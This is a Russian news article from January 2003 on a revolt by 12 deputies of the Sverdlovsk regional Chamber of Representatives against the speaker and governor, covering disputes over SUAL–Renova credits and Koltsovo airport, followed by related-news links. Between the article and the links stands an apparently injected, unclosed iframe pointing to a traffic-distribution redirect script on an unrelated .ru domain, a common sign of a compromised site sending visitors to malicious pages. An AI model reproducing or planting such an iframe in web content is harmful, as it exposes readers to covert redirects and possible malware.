22.01.2003, 10:55

Скандал в высоком семействе

События в Палате Представителей Законодательного Собрания Свердловской области, происшедшие 21 января, ожидались наблюдателями, хотя многие из непосредственных участников пресловутой парламентской революции сами до конца не верили, что депутатам хватит мужества собраться вместе и погрозить кулаком своему спикеру, правительству и губернатору.

Что же собственной произошло? Утром 21 января группа депутатов ППЗС попыталась провести внеочередное заседание Палаты Представителей. Сначала их было только семеро, однако к середине дня под знамя оппозиции встали уже 12 депутатов. Учитывая, что всего депутатов 19 (за вычетом «московского сидельца» Федулева и покинувшего ряды ППЗС Олега Лукина), ситуацию можно считать скандальной. Из-за аппаратного противодействия спикера ППЗС Якимова и его освобожденного заместителя Никитина, байкотировавших заседание, депутатам удалось провести только совещание. Тем не менее, даже его итоги достаточно сенсационны.

Палата представителей всегда была в Свердловской области какой-то ритуальной структурой, и никто никогда не ждал от нее никаких демаршей. Особенно в год трудных губернаторских выборов. Зато теперь, когда тихая палата показала свой нрав, ситуация сложилась крайне неприятная. Депутаты Палаты – люди сплошь уважаемые и заслуженные, от которых просто так не отмахнешься. Претензии их вполне обоснованы. Что делать – непонятно.

Чего хотят депутаты? Думается, что самое главное – власти. Это вполне естественно для всякого человека, занимающегося политикой. Депутаты хотят участвовать в принятие наиболее важных экономических и политических решений, и их социальный и политический статус вполне к тому располагает.

Другие интересы гораздо меркантильнее. Никому неприятно, когда приближенная к правительству группа СУАЛ – «Ренова» получает супервыгодные кредиты и возможность управлять таким лакомым куском областной экономики, как аэропорт «Кольцово». Особенно, если и у самого в наличие есть ФПГ, которая непрочь получить кредит или заняться управлением аэропорта.

Это-то противоречие и следует считать основным: тесная дружба с СУАЛом интересна только небольшой части политической элиты области. Все остальные не получают от этой дружбе ничего. В год губернаторских выборов даже полуритуальная Палата Представителей обретает голос и активно требует учета своих политических и экономических интересов.

Перспективы у ситуации различные. Обозначим лишь некоторые возможности.

Первое: правительству удается разбить ряды оппозиции, оставив ее в меньшинстве и лишив, таким образом, возможности активно влиять на ситуацию.

Второе: оппозиции удается сохранить единство своих рядов. Тогда серией политических демаршей она начинает давить на руководство области. В условиях выборов им идут на встречу и удовлетворяют их требования. В частности, структуры ОПС «Уралмаш» получают контроль над Кольцово.

Третье: оппозиция меняет спикера ППЗС и начинает активно противостоять губернатору. Это значительно меняет политическую ситуацию в области и делает выборную кампанию еще более непредсказуемой. Реализация этого варианта возможна только в том случае, если руководство области не пойдет на удовлетворение экономических требований оппозиции.
Особую пикантность всей ситуации предает явное отсутствие у правительства эффективных медиа-ресурсов, способных нейтрализовать ситуацию.

В любом случае, ситуация в ППЗС – это первое крупное сражение в начинающейся губернаторской кампании. Пока губернаторские силы в явном проигрыше.

<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1

Похожие новости по теме
29.11.2007, 15:00

Палата представителей взбунтовалась против Думы и правительства

Небывалый в истории свердловского парламентаризма скандал произошел сегодня на заседании Палаты представителей. Как выяснили сенаторы, ряд принятых Думой областных законов уже подписаны губернатором...

19.04.2004, 13:37

21 апреля новый состав Законодательного собрания области начинает свою работу

21 апреля в 10.00 в зале заседаний на 14-м этаже Дома правительства состоится первое заседание обновленного состава Областной Думы. В повестку внесены вопросы об избрании председателя Областной Думы,...

09.06.2003, 09:53

ППЗС подумает о дате выборов

Сегодня состоится заседание Палаты представителей Законодательного Собрания Свердловской области. Предполагается, что на нем будет рассмотрен вопрос о назначении точной даты губернаторских выборов. ...

27.05.2003, 11:01

Заседание Думы могут сорвать

Комментируя ИА «Политсовет» предложение ряда депутатов областной Думы провести 29 мая внеочередное заседание для обсуждения вопроса о назначении членов Избирательной комиссии, депутат от фракции КПРФ...

29.04.2003, 09:34

ППЗС хочет сама решать судьбу губернатора

Сегодня на заседании Палаты представителей Законодательного Собрания Свердловской области, ее депутаты отклонили законопроект о внесении изменений и дополнений в статьи областного Устава и оставили...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам